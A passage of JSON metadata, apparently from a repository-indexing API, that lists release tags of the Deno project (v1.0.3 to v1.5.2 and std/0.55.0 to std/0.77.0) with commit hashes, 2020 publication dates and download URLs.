ind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"